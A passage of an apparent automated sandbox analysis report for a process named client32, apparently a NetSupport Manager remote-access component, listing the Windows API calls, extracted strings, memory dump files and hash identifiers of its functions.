                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24615074E002299FEB14CF55DC81F9AB7B5BF84314F0080A8E5499B281EB71E994CF95
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,BBC4A55B,?,?,?), ref: 11065470
                                                                                                                                                                                                    • SetEvent.KERNEL32 ref: 1106549A
                                                                                                                                                                                                    • timeGetTime.WINMM ref: 110654D3
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 110654F0
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 11065581
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Unpausing sessionz %dz, rxpending = %d, lag = %d, pausedfor %d ms, xrefs: 1106554E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$DecrementEnterEventInterlockedLeaveTimetime
                                                                                                                                                                                                    • String ID: Unpausing sessionz %dz, rxpending = %d, lag = %d, pausedfor %d ms
                                                                                                                                                                                                    • API String ID: 2700130086-2729525473
                                                                                                                                                                                                    • Opcode ID: d77fa92413a1a65b302bc16da95b1b73e0b8ab402638c7d2822101c89923dd69
                                                                                                                                                                                                    • Instruction ID: 3b3d7615ea4610ef5d080b5e58bc799fd5b460a4b46124fee3b0225fd41c603b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d77fa92413a1a65b302bc16da95b1b73e0b8ab402638c7d2822101c89923dd69
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4418775A00A059FD715CF64C998BAAFBF9FB48348F00855DE82AC7254C731FA00CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D45A
                                                                                                                                                                                                    • RegisterClassExA.USER32(?), ref: 1101D4AB
                                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11190240,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D4DE
                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 1101D4EB
                                                                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 1101D4F2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Class$CreateDestroyInfoRectRegister
                                                                                                                                                                                                    • String ID: NSMChatSizeWnd
                                                                                                                                                                                                    • API String ID: 691703853-4119039562
                                                                                                                                                                                                    • Opcode ID: 278526c9658a69e7a40e6cb25d6626fde906cf365c21d4dc24fc7d5a55472854
                                                                                                                                                                                                    • Instruction ID: dcbcbcf091995d4067a9012f4e3e9d0ed9d195d12c757acb72af4b7ecf5f03b9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 278526c9658a69e7a40e6cb25d6626fde906cf365c21d4dc24fc7d5a55472854
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D63180B5D0121DAFCB10DFA5DDC4AEEFBB8EB48318F20456EF925A3240D73569018B61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,BBC4A55B), ref: 1100959B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • IsA(), xrefs: 11009555, 1100957D
                                                                                                                                                                                                    • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 11009521
                                                                                                                                                                                                    • https://, xrefs: 110094DF
                                                                                                                                                                                                    • http://, xrefs: 110094E5, 110094F8
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009550, 11009578
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                                                    • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
                                                                                                                                                                                                    • API String ID: 3934441357-3154135529
                                                                                                                                                                                                    • Opcode ID: 35d060acf12ccdd480c04a845a76d973b580c562fc5caea60c424b02d90a38e1
                                                                                                                                                                                                    • Instruction ID: d20e6e8e82cea177770e9d14c68faf5d1120bac870e30f80c07a18668992f196
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35d060acf12ccdd480c04a845a76d973b580c562fc5caea60c424b02d90a38e1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71315C75E0065AABDB00DF95DC84FDEB7B8EF49658F004259E825A7280EB35A604CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDlgItem.USER32(00000008,?), ref: 1107F423
                                                                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 1107F42A
                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 1107F479
                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 1107F48A
                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 1107F49B
                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 1107F4AF
                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 1107F4C0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Destroy$ImageList_Window$Item
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2011978658-0
                                                                                                                                                                                                    • Opcode ID: 4ef4a5cc33dd472153f747ca7b7130ad6465e017194e93073560657cd39c3bd2
                                                                                                                                                                                                    • Instruction ID: ec4039ea74ad51d6978165d503915976cebcaf838e6cc7621bcf85df41ceaee6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ef4a5cc33dd472153f747ca7b7130ad6465e017194e93073560657cd39c3bd2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4216D70E003119BDB10CF68C8C4B5ABBE8BF04318F1185ADED54DB245DB75E945CBA6
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110CF020: wvsprintfA.USER32(?,11190240,?), ref: 110CF052
                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 11009686
                                                                                                                                                                                                    • WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 1100969B
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • IsA(), xrefs: 1100963D, 11009665
                                                                                                                                                                                                    • <tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 11009695
                                                                                                                                                                                                    • <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 11009609
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009638, 11009660
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                                                                    • String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                                                    • API String ID: 863766397-389219706
                                                                                                                                                                                                    • Opcode ID: a9ab368e51e575faf8e801c944165846c0240e679e3174c5e2828c94065c910c
                                                                                                                                                                                                    • Instruction ID: a1209e8bcef48249843ed2990b636ee265ac836deafb44f4c9fe9e5cc28cb7ac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9ab368e51e575faf8e801c944165846c0240e679e3174c5e2828c94065c910c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18215E75A0061DABDB00DF95DC81FEEF3B8EF48714F104259E925B3280EB746904CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,BBC4A55B,?,?,?,?,?,Function_001813A8,000000FF), ref: 110655D5
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1106568A
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterErrorExitLastLeaveMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Connect.cpp$ResetCompressor(been_reset=1)$ResetCompressor(flush=1)$idata->compress_idata$idata->tr
                                                                                                                                                                                                    • API String ID: 4291042357-1363257856
                                                                                                                                                                                                    • Opcode ID: b4fa89648e62d340c1c68cf08e8a8579354e9277a1d3320003daeee094152cbc
                                                                                                                                                                                                    • Instruction ID: 2c4b7734daa966d9fa8e91b450ceb5c846ce48a0af7907dd07521c007f0c2814
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4fa89648e62d340c1c68cf08e8a8579354e9277a1d3320003daeee094152cbc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2121B0B6E00609AFD720CF65DC81FDAF7E8EB04758F004429F52A93640E7757640CB95
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 689CDA47
                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,?,?,?,00000000,?), ref: 689CDA6A
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?), ref: 689CDA97
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000000,?), ref: 689CDAA1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                                                    • String ID: Refcount.cpp$hThread
                                                                                                                                                                                                    • API String ID: 3360349984-1332212576
                                                                                                                                                                                                    • Opcode ID: 1aed249cb3036f2dd716e2553e4cb86e15cc4fadf4cd9d74c1be9d825b11ae2b
                                                                                                                                                                                                    • Instruction ID: ff1687cbd47d539a75bb43de2e29b09202236d2acb9060c47dbcb4278ed7a1ef
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1aed249cb3036f2dd716e2553e4cb86e15cc4fadf4cd9d74c1be9d825b11ae2b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF01B175388301BFE7248F55DC49F1B7BACEB85725F404228FA1997280D671E405CBA2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadIconA.USER32(00000000,0000139A), ref: 1101D3AF
                                                                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 1101D3BF
                                                                                                                                                                                                    • RegisterClassExA.USER32(00000030), ref: 1101D3E1
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1101D3E7
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
